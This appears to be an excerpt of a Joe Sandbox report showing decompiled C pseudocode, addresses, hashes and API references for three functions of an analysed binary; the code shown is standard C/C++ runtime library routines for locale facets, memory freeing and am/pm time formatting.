Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 306aef2a5777d970c97a66193c737a010790088b0375ea2ee7d6682ee2f8833e
Instruction ID: 814f04cff005cd958c436b3508466885335f18f5e6ae05c0472ba592f6cca38e
Opcode Fuzzy Hash: 306aef2a5777d970c97a66193c737a010790088b0375ea2ee7d6682ee2f8833e
Instruction Fuzzy Hash: 4D01D23691032B8BDF15FB68C5546BEBBB9BF94328F680408E6116B284CF34AD45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0132B2F1, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0132B2F1(void* __eflags, void* __fp0) {
				signed int _t47;
				void* _t74;
				signed int _t111;
				void* _t121;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				void* _t132;

				_push(8);
				E0132F1B6(0x1368615, __eflags);
				E013177B6(_t132 - 0x14, 0);
				_t125 =  *0x13aaab0; // 0x0
				 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
				 *(_t132 - 0x10) = _t125;
				_t47 = E012F9A10( *((intOrPtr*)(_t132 + 8)), E012F9850(0x13aaa90));
				_t122 = _t47;
				if(_t47 != 0) {
					L5:
					E0131780E(_t132 - 0x14);
					return E0132F190(_t122, _t135);
				} else {
					_t135 = _t125;
					if(_t125 == 0) {
						_push( *((intOrPtr*)(_t132 + 8)));
						_push(_t132 - 0x10);
						__eflags = E0132B815(_t125, __eflags, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E012F9060();
							asm("int3");
							_push(8);
							E0132F1B6(0x1368615, __eflags);
							E013177B6(_t132 - 0x14, 0);
							_t126 =  *0x13aaab8; // 0x0
							 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
							 *(_t132 - 0x10) = _t126;
							_t123 = E012F9A10( *((intOrPtr*)(_t132 + 8)), E012F9850(0x13aaa98));
							__eflags = _t123;
							if(_t123 != 0) {
								L12:
								E0131780E(_t132 - 0x14);
								return E0132F190(_t123, __eflags);
							} else {
								__eflags = _t126;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t132 + 8)));
									_push(_t132 - 0x10);
									__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
									if(__eflags == 0) {
										E012F9060();
										asm("int3");
										_push(8);
										E0132F1B6(0x1368615, __eflags);
										E013177B6(_t132 - 0x14, 0);
										_t127 =  *0x13aaabc; // 0x0
										 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
										 *(_t132 - 0x10) = _t127;
										_t124 = E012F9A10( *((intOrPtr*)(_t132 + 8)), E012F9850(0x13aaa9c));
										__eflags = _t124;
										if(_t124 != 0) {
											L19:
											E0131780E(_t132 - 0x14);
											return E0132F190(_t124, __eflags);
										} else {
											__eflags = _t127;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t132 + 8)));
												_push(_t132 - 0x10);
												_t74 = E0132B906(_t121, _t127, __eflags);
												_pop(_t111);
												__eflags = _t74 - 0xffffffff;
												if(__eflags == 0) {
													E012F9060();
													asm("int3");
													_push(4);
													E0132F1B6(0x1368ad3, __eflags);
													_t128 = _t111;
													 *(_t132 - 0x10) = _t128;
													 *((intOrPtr*)(_t128 + 4)) =  *((intOrPtr*)(_t132 + 0xc));
													_push( *((intOrPtr*)(_t132 + 8)));
													_t41 = _t132 - 4;
													 *_t41 =  *(_t132 - 4) & 0x00000000;
													__eflags =  *_t41;
													 *_t128 = 0x1376c58;
													E0132C81A(_t111, _t121, __eflags, __fp0);
													return E0132F190(_t128, __eflags);
												} else {
													_t124 =  *(_t132 - 0x10);
													 *(_t132 - 0x10) = _t124;
													 *(_t132 - 4) = 1;
													E0131792B(__eflags, _t124);
													 *0x1374358();
													 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 4))))();
													 *0x13aaabc = _t124;
													goto L19;
												}
											} else {
												_t124 = _t127;
												goto L19;
											}
										}
									} else {
										_t123 =  *(_t132 - 0x10);
										 *(_t132 - 0x10) = _t123;
										 *(_t132 - 4) = 1;
										E0131792B(__eflags, _t123);
										 *0x1374358();
										 *((intOrPtr*)( *((intOrPtr*)( *_t123 + 4))))();
										 *0x13aaab8 = _t123;
										goto L12;
									}
								} else {
									_t123 = _t126;
									goto L12;
								}
							}
						} else {
							_t122 =  *(_t132 - 0x10);
							 *(_t132 - 0x10) = _t122;
							 *(_t132 - 4) = 1;
							E0131792B(__eflags, _t122);
							 *0x1374358();
							 *((intOrPtr*)( *((intOrPtr*)( *_t122 + 4))))();
							 *0x13aaab0 = _t122;
							goto L5;
						}
					} else {
						_t122 = _t125;
						goto L5;
					}
				}
			}

0x0132b2f1
0x0132b2f8
0x0132b302
0x0132b307
0x0132b312
0x0132b316
0x0132b322
0x0132b327
0x0132b32b
0x0132b370
0x0132b373
0x0132b37f
0x0132b32d
0x0132b32d
0x0132b32f
0x0132b335
0x0132b33b
0x0132b343
0x0132b346
0x0132b380
0x0132b385
0x0132b386
0x0132b38d
0x0132b397
0x0132b39c
0x0132b3a7
0x0132b3ab
0x0132b3bc
0x0132b3be
0x0132b3c0
0x0132b405
0x0132b408
0x0132b414
0x0132b3c2
0x0132b3c2
0x0132b3c4
0x0132b3ca
0x0132b3d0
0x0132b3d8
0x0132b3db
0x0132b415
0x0132b41a
0x0132b41b
0x0132b422
0x0132b42c
0x0132b431
0x0132b43c
0x0132b440
0x0132b451
0x0132b453
0x0132b455
0x0132b49a
0x0132b49d
0x0132b4a9
0x0132b457
0x0132b457
0x0132b459
0x0132b45f
0x0132b465
0x0132b466
0x0132b46c
0x0132b46d
0x0132b470
0x0132b4aa
0x0132b4af
0x0132b4b0
0x0132b4b7
0x0132b4bc
0x0132b4be
0x0132b4c4
0x0132b4c7
0x0132b4ca
0x0132b4ca
0x0132b4ca
0x0132b4ce
0x0132b4d4
0x0132b4e0
0x0132b472
0x0132b472
0x0132b475
0x0132b479
0x0132b47d
0x0132b48a
0x0132b492
0x0132b494
0x00000000
0x0132b494
0x0132b45b
0x0132b45b
0x00000000
0x0132b45b
0x0132b459
0x0132b3dd
0x0132b3dd
0x0132b3e0
0x0132b3e4
0x0132b3e8
0x0132b3f5
0x0132b3fd
0x0132b3ff
0x00000000
0x0132b3ff
0x0132b3c6
0x0132b3c6
0x00000000
0x0132b3c6
0x0132b3c4
0x0132b348
0x0132b348
0x0132b34b
0x0132b34f
0x0132b353
0x0132b360
0x0132b368
0x0132b36a
0x00000000
0x0132b36a
0x0132b331
0x0132b331
0x00000000
0x0132b331
0x0132b32f

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0132B302

Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889

moneypunct.LIBCPMT ref: 0132B33C
std::_Facet_Register.LIBCPMT ref: 0132B353
std::_Lockit::~_Lockit.LIBCPMT ref: 0132B373
Concurrency::cancel_current_task.LIBCPMT ref: 0132B380

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 9188411130637cd4c5b958065f397cdc9aa73f6b29e8106e6618de48d8fb988d
Instruction ID: f1c4c7c8fd1f53133823df0a66ddcf1b5baed49791e6c28a72e5e547b6c6a26c
Opcode Fuzzy Hash: 9188411130637cd4c5b958065f397cdc9aa73f6b29e8106e6618de48d8fb988d
Instruction Fuzzy Hash: A201D63691022ACBDF15FB68C4046BEBBB9BF94728F240008DA1167284DF309D45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0135CFCB, Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0135CFCB(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x13a4190; // 0x13a41e4
					if(_t23 != 0) {
						E01355C8F(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x13a4194; // 0x13ab15c
					if(_t24 != 0) {
						E01355C8F(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x13a4198; // 0x13ab15c
					if(_t25 != 0) {
						E01355C8F(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x13a41c0; // 0x13a41e8
					if(_t26 != 0) {
						E01355C8F(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x13a41c4; // 0x13ab160
					if(_t27 != 0) {
						return E01355C8F(_t6);
					}
				}
				return _t6;
			}

0x0135cfd1
0x0135cfd6
0x0135cfda
0x0135cfe0
0x0135cfe3
0x0135cfe8
0x0135cfec
0x0135cff2
0x0135cff5
0x0135cffa
0x0135cffe
0x0135d004
0x0135d007
0x0135d00c
0x0135d010
0x0135d016
0x0135d019
0x0135d01e
0x0135d01f
0x0135d022
0x0135d028
0x00000000
0x0135d030
0x0135d028
0x0135d033

APIs

_free.LIBCMT ref: 0135CFE3

Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7

_free.LIBCMT ref: 0135CFF5
_free.LIBCMT ref: 0135D007
_free.LIBCMT ref: 0135D019
_free.LIBCMT ref: 0135D02B

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 331a3a2a3521c2cedfd3203fae05c96c9468d1f3d2eb26f2a2c39621e9ce6ad9
Instruction ID: 20363b1e40b8e21c21e7ff0006c5cd2fb74d01a1247d17fee558bb35ebac8cab
Opcode Fuzzy Hash: 331a3a2a3521c2cedfd3203fae05c96c9468d1f3d2eb26f2a2c39621e9ce6ad9
Instruction Fuzzy Hash: 1DF03632608201ABDBB0DB9CF585C1A7BDDBB14F58BA81A05F94AD7545CB70F8814B60

Uniqueness

Uniqueness Score: -1.00%

Function 01351877, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 375
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 52%

			E01351877(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int** _v32;
				char _v36;
				signed int* _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				void* _v64;
				void* __esi;
				signed int _t82;
				intOrPtr _t87;
				signed char _t90;
				signed int _t91;
				void* _t92;
				signed int _t93;
				signed int _t98;
				signed int _t100;
				signed int** _t102;
				signed int _t108;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t135;
				void* _t136;
				signed int _t138;
				intOrPtr _t141;
				void* _t142;
				signed int _t144;
				signed int _t145;
				signed int* _t149;
				signed short* _t150;
				void* _t151;
				signed int* _t152;
				intOrPtr _t153;
				signed int _t156;
				signed short** _t158;
				signed int _t159;
				intOrPtr _t160;
				intOrPtr _t161;
				signed int _t162;
				signed int _t164;
				intOrPtr* _t175;
				signed short _t176;
				signed short* _t177;
				signed int** _t178;
				void* _t181;
				signed short* _t183;
				signed int _t184;
				signed int _t185;
				signed int** _t186;
				signed int _t187;
				signed int _t188;

				_t82 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t82 ^ _t187;
				_t175 = _a12;
				_t153 = _a24;
				_v52 = _a4;
				_t149 = _a20;
				_v32 = _a16;
				_v48 = _t175;
				_v40 = _t149;
				_v44 = _t153;
				_t87 = _a8;
				if(_t87 == 0) {
					_t183 =  *(_t153 + 0x154);
				} else {
					if(_t87 == 1) {
						_t183 =  *(_t153 + 0x158);
					} else {
						_t183 =  *(_t153 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t153 + 0xac)) == 1) {
					goto L112;
				} else {
					_v24 = 0x76c +  *((intOrPtr*)(_t175 + 0x14));
					_v22 =  *((intOrPtr*)(_t175 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t175 + 0xc));
					_v16 =  *((intOrPtr*)(_t175 + 8));
					_v14 =  *((intOrPtr*)(_t175 + 4));
					_v12 =  *_t175;
					_v10 = 0;
					_t135 =  *((intOrPtr*)(_t153 + 0x160));
					_push(0);
					_push(0);
					if(_a8 != 2) {
						_push(0);
						_push(_t183);
						_push( &_v24);
						_push(0);
						_push(_t135);
						_t136 = E01356238();
					} else {
						_push(_t183);
						_push( &_v24);
						_push(0);
						_push(_t135);
						_t136 = E013562CE();
					}
					_t151 = _t136;
					if(_t151 == 0) {
						L31:
						_t149 = _v40;
						while(1) {
							L112:
							_t176 =  *_t183 & 0x0000ffff;
							__eflags = _t176;
							if(_t176 == 0) {
								break;
							}
							_t185 =  *_t149;
							__eflags = _t185;
							if(_t185 == 0) {
								goto L28;
							}
							_v36 = 0;
							_t90 = 0;
							__eflags = 0;
							_v28 = _t183;
							_t150 = _t183;
							_t156 = _t176 & 0x0000ffff;
							do {
								_t150 =  &(_t150[1]);
								_t90 = _t90 + 1;
								__eflags =  *_t150 - _t156;
							} while ( *_t150 == _t156);
							_t157 = _t176 & 0x0000ffff;
							_v28 = _t150;
							_t149 = _v40;
							__eflags = _t157 - 0x64;
							if(__eflags > 0) {
								_t157 = _t157 - 0x68;
								__eflags = _t157;
								if(_t157 == 0) {
									_t91 = _t90 - 1;
									__eflags = _t91;
									if(_t91 == 0) {
										_v36 = 1;
										L109:
										_push(0x49);
										L110:
										_pop(_t92);
										_t93 = E01350D82(_t157, _v52, _t92, _v48, _v32, _t149, _v44, _v36);
										_t188 = _t188 + 0x1c;
										__eflags = _t93;
										if(__eflags == 0) {
											 *((intOrPtr*)(E0134B45F(__eflags))) = 0x16;
											goto L29;
										}
										L111:
										_t183 = _v28;
										continue;
									}
									__eflags = _t91 == 1;
									if(_t91 == 1) {
										goto L109;
									}
									L107:
									_t158 = _v32;
									_t183 =  &(_t183[1]);
									 *( *_t158) = _t176;
									 *_t158 =  &(( *_t158)[1]);
									 *_t149 =  *_t149 - 1;
									continue;
								}
								_t157 = _t157 - 5;
								__eflags = _t157;
								if(_t157 == 0) {
									_t98 = _t90 - 1;
									__eflags = _t98;
									if(_t98 == 0) {
										_v36 = 1;
										L104:
										_push(0x4d);
										goto L110;
									}
									__eflags = _t98 == 1;
									if(_t98 == 1) {
										goto L104;
									}
									goto L107;
								}
								_t157 = _t157 - 6;
								__eflags = _t157;
								if(_t157 == 0) {
									_t100 = _t90 - 1;
									__eflags = _t100;
									if(_t100 == 0) {
										_v36 = 1;
										L99:
										_push(0x53);
										goto L110;
									}
									__eflags = _t100 == 1;
									if(_t100 == 1) {
										goto L99;
									}
									goto L107;
								}
								_t159 = _t157 - 1;
								__eflags = _t159;
								if(_t159 == 0) {
									_t160 = _v48;
									__eflags =  *((intOrPtr*)(_t160 + 8)) - 0xb;
									_t161 = _v44;
									if( *((intOrPtr*)(_t160 + 8)) > 0xb) {
										_t177 =  *(_t161 + 0x150);
									} else {
										_t177 =  *(_t161 + 0x14c);
									}
									__eflags = _t90 - 1;
									if(_t90 != 1) {
										L90:
										_t162 =  *_t177 & 0x0000ffff;
										__eflags = _t162;
										if(_t162 == 0) {
											goto L111;
										}
										_t102 = _v32;
										while(1) {
											__eflags = _t185;
											if(_t185 == 0) {
												goto L111;
											}
											_t177 =  &(_t177[1]);
											 *( *_t102) = _t162;
											_t102 = _v32;
											 *_t102 =  &(( *_t102)[0]);
											 *_t149 =  *_t149 - 1;
											_t162 =  *_t177 & 0x0000ffff;
											_t185 =  *_t149;
											__eflags = _t162;
											if(_t162 != 0) {
												continue;
											}
											goto L111;
										}
									} else {
										__eflags = _t185;
										if(_t185 == 0) {
											goto L90;
										}
										 *( *_v32) =  *_t177;
										 *_v32 =  &(( *_v32)[0]);
										 *_t149 =  *_t149 - 1;
									}
									goto L111;
								}
								_t157 = _t159 != 5;
								__eflags = _t159 != 5;
								if(_t159 != 5) {
									goto L107;
								}
								_t108 = _t90;
								__eflags = _t108;
								if(_t108 == 0) {
									_push(0x79);
									goto L110;
								}
								__eflags = _t108 != 0;
								if(_t108 != 0) {
									goto L107;
								}
								_push(0x59);
								goto L110;
							}
							if(__eflags == 0) {
								_t111 = _t90 - 1;
								__eflags = _t111;
								if(_t111 == 0) {
									_v36 = 1;
									L74:
									_push(0x64);
									goto L110;
								}
								_t112 = _t111 - 1;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L74;
								}
								_t113 = _t112 - 1;
								__eflags = _t113;
								if(_t113 == 0) {
									_push(0x61);
									goto L110;
								}
								__eflags = _t113 != 1;
								if(_t113 != 1) {
									goto L107;
								}
								_push(0x41);
								goto L110;
							}
							__eflags = _t157 - 0x27;
							if(_t157 == 0x27) {
								_t183 =  &(_t183[_t90]);
								__eflags = _t90 & 0x00000001;
								if((_t90 & 0x00000001) == 0) {
									continue;
								}
								_t164 =  *_t183 & 0x0000ffff;
								__eflags = _t164;
								if(_t164 == 0) {
									goto L28;
								}
								_t178 = _v32;
								while(1) {
									__eflags = _t185;
									if(_t185 == 0) {
										goto L112;
									}
									_t115 = 0x27;
									_t183 =  &(_t183[1]);
									__eflags = _t164 - _t115;
									if(_t164 == _t115) {
										goto L112;
									}
									 *( *_t178) = _t164;
									 *_t178 =  &(( *_t178)[0]);
									 *_t149 =  *_t149 - 1;
									_t164 =  *_t183 & 0x0000ffff;
									_t185 =  *_t149;
									__eflags = _t164;
									if(_t164 != 0) {
										continue;
									}
									goto L112;
								}
								continue;
							}
							__eflags = _t157 - 0x41;
							if(_t157 == 0x41) {
								L42:
								_t117 = E0135B52B(_t183, _t185, _t183, L"am/pm");
								__eflags = _t117;
								if(_t117 != 0) {
									_t118 = E0135B52B(_t183, _t185, _t183, L"a/p");
									_pop(_t157);
									__eflags = _t118;
									if(_t118 == 0) {
										_v28 =  &(_t183[3]);
									}
								} else {
									_t157 =  &(_t183[5]);
									_v28 =  &(_t183[5]);
								}
								_push(0x70);
								goto L110;
							}
							__eflags = _t157 - 0x48;
							if(_t157 == 0x48) {
								_t120 = _t90 - 1;
								__eflags = _t120;
								if(_t120 == 0) {
									_v36 = 1;
									L56:
									_push(0x48);
									goto L110;
								}
								__eflags = _t120 == 1;
								if(_t120 == 1) {
									goto L56;
								}
								goto L107;
							}
							__eflags = _t157 - 0x4d;
							if(_t157 == 0x4d) {
								_t122 = _t90 - 1;
								__eflags = _t122;
								if(_t122 == 0) {
									_v36 = 1;
									L51:
									_push(0x6d);
									goto L110;
								}
								_t123 = _t122 - 1;
								__eflags = _t123;
								if(_t123 == 0) {
									goto L51;
								}
								_t124 = _t123 - 1;
								__eflags = _t124;
								if(_t124 == 0) {
									_push(0x62);
									goto L110;
								}
								__eflags = _t124 != 1;
								if(_t124 != 1) {
									goto L107;
								}
								_push(0x42);
								goto L110;
							}
							__eflags = _t157 - 0x61;
							if(_t157 != 0x61) {
								goto L107;
							}
							goto L42;
						}
						goto L28;
					} else {
						_t33 = _t151 + _t151 + 8; // 0x8
						asm("sbb eax, eax");
						_t138 = _t151 + _t151 & _t33;
						if(_t138 == 0) {
							_t185 = 0;
							__eflags = 0;
							L18:
							_v28 = _t185;
							if(_t185 == 0) {
								L30:
								E0131C983(0);
								goto L31;
							}
							_t141 =  *((intOrPtr*)(_v44 + 0x160));
							if(_a8 != 2) {
								_t142 = E01356238(_t141, 0,  &_v24, _t183, _t185, _t151, 0);
							} else {
								_t142 = E013562CE(_t141, 0,  &_v24, _t183, _t185, _t151);
							}
							_t184 = _t185;
							_t181 = _t142 - 1;
							if(_t181 <= 0) {
								L27:
								E0131C983(_t185);
								L28:
								L29:
								return E0132EA79(_v8 ^ _t187, _t185);
							} else {
								_t152 = _v40;
								_t186 = _v32;
								_t144 =  *_t152;
								while(_t144 != 0) {
									_t145 =  *_t184;
									_t184 = _t184 + 2;
									 *( *_t186) = _t145;
									 *_t186 =  &(( *_t186)[0]);
									 *_t152 =  *_t152 - 1;
									_t181 = _t181 - 1;
									_t144 =  *_t152;
									if(_t181 > 0) {
										continue;
									}
									break;
								}
								_t185 = _v28;
								goto L27;
							}
						}
						if(_t138 > 0x400) {
							_t185 = E013576ED(_t138);
							_v28 = _t185;
							__eflags = _t185;
							if(_t185 == 0) {
								goto L30;
							}
							 *_t185 = 0xdddd;
							L14:
							_t185 = _t185 + 8;
							goto L18;
						}
						E0132F420();
						_t185 = _t188;
						_v28 = _t185;
						if(_t185 == 0) {
							goto L30;
						}
						 *_t185 = 0xcccc;
						goto L14;
					}
				}
			}

0x0135187f
0x01351886
0x0135188c
0x0135188f
0x01351892
0x01351899
0x0135189c
0x013518a2
0x013518a5
0x013518a8
0x013518ad
0x013518b0
0x013518c7
0x013518b2
0x013518b5
0x013518bf
0x013518b7
0x013518b7
0x013518b7
0x013518b5
0x013518d4
0x00000000
0x013518da
0x013518e3
0x013518ed
0x013518f5
0x013518fd
0x01351905
0x0135190e
0x01351918
0x0135191c
0x01351925
0x01351926
0x01351927
0x01351934
0x01351935
0x01351936
0x01351937
0x01351938
0x01351939
0x01351929
0x01351929
0x0135192a
0x0135192b
0x0135192c
0x0135192d
0x0135192d
0x0135193e
0x01351942
0x01351a1f
0x01351a1f
0x01351c9a
0x01351c9a
0x01351c9a
0x01351c9d
0x01351ca0
0x00000000
0x00000000
0x01351a27
0x01351a29
0x01351a2b
0x00000000
0x00000000
0x01351a2d
0x01351a31
0x01351a31
0x01351a33
0x01351a36
0x01351a38
0x01351a3b
0x01351a3b
0x01351a3e
0x01351a3f
0x01351a3f
0x01351a44
0x01351a47
0x01351a4a
0x01351a4d
0x01351a50
0x01351b7a
0x01351b7a
0x01351b7d
0x01351c57
0x01351c57
0x01351c5a
0x01351c73
0x01351c77
0x01351c77
0x01351c79
0x01351c79
0x01351c8b
0x01351c90
0x01351c93
0x01351c95
0x01351cb0
0x00000000
0x01351cb6
0x01351c97
0x01351c97
0x00000000
0x01351c97
0x01351c5c
0x01351c5f
0x00000000
0x00000000
0x01351c61
0x01351c61
0x01351c64
0x01351c69
0x01351c6c
0x01351c6f
0x00000000
0x01351c6f
0x01351b83
0x01351b83
0x01351b86
0x01351c43
0x01351c43
0x01351c46
0x01351c4f
0x01351c53
0x01351c53
0x00000000
0x01351c53
0x01351c48
0x01351c4b
0x00000000
0x00000000
0x00000000
0x01351c4d
0x01351b8c
0x01351b8c
0x01351b8f
0x01351c2f
0x01351c2f
0x01351c32
0x01351c3b
0x01351c3f
0x01351c3f
0x00000000
0x01351c3f
0x01351c34
0x01351c37
0x00000000
0x00000000
0x00000000
0x01351c39
0x01351b95
0x01351b95
0x01351b98
0x01351bc1
0x01351bc4
0x01351bc8
0x01351bcb
0x01351bd5
0x01351bcd
0x01351bcd
0x01351bcd
0x01351bdb
0x01351bde
0x01351bfc
0x01351bfc
0x01351bff
0x01351c02
0x00000000
0x00000000
0x01351c08
0x01351c0b
0x01351c0b
0x01351c0d
0x00000000
0x00000000
0x01351c15
0x01351c18
0x01351c1b
0x01351c1e
0x01351c21
0x01351c23
0x01351c26
0x01351c28
0x01351c2b
0x00000000
0x00000000
0x00000000
0x01351c2d
0x01351be0
0x01351be0
0x01351be2
0x00000000
0x00000000
0x01351bec
0x01351bf2
0x01351bf5
0x01351bf5
0x00000000
0x01351bde
0x01351b9a
0x01351b9a
0x01351b9d
0x00000000
0x00000000
0x01351ba4
0x01351ba4
0x01351ba7
0x01351bba
0x00000000
0x01351bba
0x01351baa
0x01351bad
0x00000000
0x00000000
0x01351bb3
0x00000000
0x01351bb3
0x01351a56
0x01351b49
0x01351b49
0x01351b4c
0x01351b6f
0x01351b73
0x01351b73
0x00000000
0x01351b73
0x01351b4e
0x01351b4e
0x01351b51
0x00000000
0x00000000
0x01351b53
0x01351b53
0x01351b56
0x01351b68
0x00000000
0x01351b68
0x01351b58
0x01351b5b
0x00000000
0x00000000
0x01351b61
0x00000000
0x01351b61
0x01351a5c
0x01351a5f
0x01351aff
0x01351b02
0x01351b04
0x00000000
0x00000000
0x01351b0a
0x01351b0d
0x01351b10
0x00000000
0x00000000
0x01351b16
0x01351b19
0x01351b19
0x01351b1b
0x00000000
0x00000000
0x01351b23
0x01351b24
0x01351b27
0x01351b2a
0x00000000
0x00000000
0x01351b32
0x01351b35
0x01351b38
0x01351b3a
0x01351b3d
0x01351b3f
0x01351b42
0x00000000
0x00000000
0x00000000
0x01351b44
0x00000000
0x01351b19
0x01351a65
0x01351a68
0x01351a7d
0x01351a83
0x01351a8a
0x01351a8c
0x01351ae7
0x01351aed
0x01351aee
0x01351af0
0x01351af5
0x01351af5
0x01351a8e
0x01351a8e
0x01351a91
0x01351a91
0x01351af8
0x00000000
0x01351af8
0x01351a6a
0x01351a6d
0x01351ac7
0x01351ac7
0x01351aca
0x01351ad6
0x01351ada
0x01351ada
0x00000000
0x01351ada
0x01351acc
0x01351acf
0x00000000
0x00000000
0x00000000
0x01351ad1
0x01351a6f
0x01351a72
0x01351a96
0x01351a96
0x01351a99
0x01351abc
0x01351ac0
0x01351ac0
0x00000000
0x01351ac0
0x01351a9b
0x01351a9b
0x01351a9e
0x00000000
0x00000000
0x01351aa0
0x01351aa0
0x01351aa3
0x01351ab5
0x00000000
0x01351ab5
0x01351aa5
0x01351aa8
0x00000000
0x00000000
0x01351aae
0x00000000
0x01351aae
0x01351a74
0x01351a77
0x00000000
0x00000000
0x00000000
0x01351a77
0x00000000
0x01351948
0x0135194b
0x01351950
0x01351952
0x01351954
0x01351996
0x01351996
0x01351998
0x01351998
0x0135199d
0x01351a17
0x01351a19
0x00000000
0x01351a1e
0x013519a9
0x013519af
0x013519c8
0x013519b1
0x013519b8
0x013519b8
0x013519cf
0x013519d1
0x013519d4
0x013519fc
0x013519fd
0x01351a03
0x01351a05
0x01351a16
0x013519d6
0x013519d6
0x013519d9
0x013519dc
0x013519de
0x013519e4
0x013519e7
0x013519ea
0x013519ed
0x013519f0
0x013519f2
0x013519f3
0x013519f7
0x00000000
0x00000000
0x00000000
0x013519f7
0x013519f9
0x00000000
0x013519f9
0x013519d4
0x0135195b
0x01351980
0x01351982
0x01351986
0x01351988
0x00000000
0x00000000
0x0135198e
0x01351975
0x01351975
0x00000000
0x01351975
0x0135195d
0x01351962
0x01351964
0x01351969
0x00000000
0x00000000
0x0135196f
0x00000000
0x0135196f
0x01351942

APIs

__freea.LIBCMT ref: 013519FD
__freea.LIBCMT ref: 01351A19

Strings

a/p, xrefs: 01351AE1
am/pm, xrefs: 01351A7D

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 0d5e50247115c8751ce870f6dd09abb5be205527ed99982196e3514591bf444a
Instruction ID: b109ea74c381203535da066e27eb0376ea2457b28331286444b570bfb211e05e
